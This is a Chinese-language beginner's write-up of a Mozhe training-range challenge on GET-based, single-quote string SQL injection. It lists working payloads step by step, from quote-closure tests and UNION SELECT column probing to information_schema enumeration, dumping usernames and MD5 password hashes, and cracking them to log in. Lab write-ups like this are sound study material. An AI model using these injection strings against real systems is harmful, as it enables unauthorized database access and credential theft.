前言
此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!
一、墨者靶场启动
墨者靶场是一个不用自己搭建就可以用的靶场,十分适合懒得搭建靶场又想练习的小白选手。网址在此:https://www.mozhe.cn/
点击访问即可
二、靶场通关思路
- 1、判断注入点
- 2、爆字段个数
- 3、爆显位位置
- 4、爆数据库名
- 5、爆数据库表
- 6、爆数据库列
- 7、爆数据库关键信息
1、判断注入点
通过上一关我们知道了注入位置在哪,我们就不赘述。点击
进去发现id默认是字符串,那么觉有可能是字符型注入了,而且此关名字也是字符型注入。(如图所示)
注入语句为
id=tingjigonggao'
发现报错(如图所示)
再次注入
id=tingjigonggao' and 1=1--+
id=tingjigonggao' and 1=2--+
发现1=1正常,1=2报错,所以是单引号闭合。(如图所示)
2、爆字段个数
(如图所示)注入语句为
id=tingjigongao' order by 1
数字1逐次提升发现是5报错。说明字段数为4
3、爆显位位置
注入语句为
id=tingjigongao' union select 1,2,3,4--+
发现显位2,3(如图所示)
4、爆数据库名、版本、用户等等
注入语句为
id=tingjigongao' union select 1,user(),database(),4--+
得到用户root@localhost,数据库名mozhe_discuz_stormgroup
5、爆数据库表
注入语句为
id=tingjigongao' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--+
得到表为notice,stormgroup_member(如图所示)
6、爆数据库列名
注入语句为
id=tingjigongao' union select 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema=database() and table_name="stormgroup_member"--+
得到列名为id,name,password,status(如图所示)
7、爆数据库数据
注入语句为
id=tingjigongao' union select 1,group_concat(name),group_concat(password),4 from stormgroup_member--+
得到密码和账号名字,密码去MD5解码
解码得到一个是dsan13,这个不能用。还有一个是850119(如图所示)
登录用户得到key
总结
这一关是get提交字符型单引号闭合注入,此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!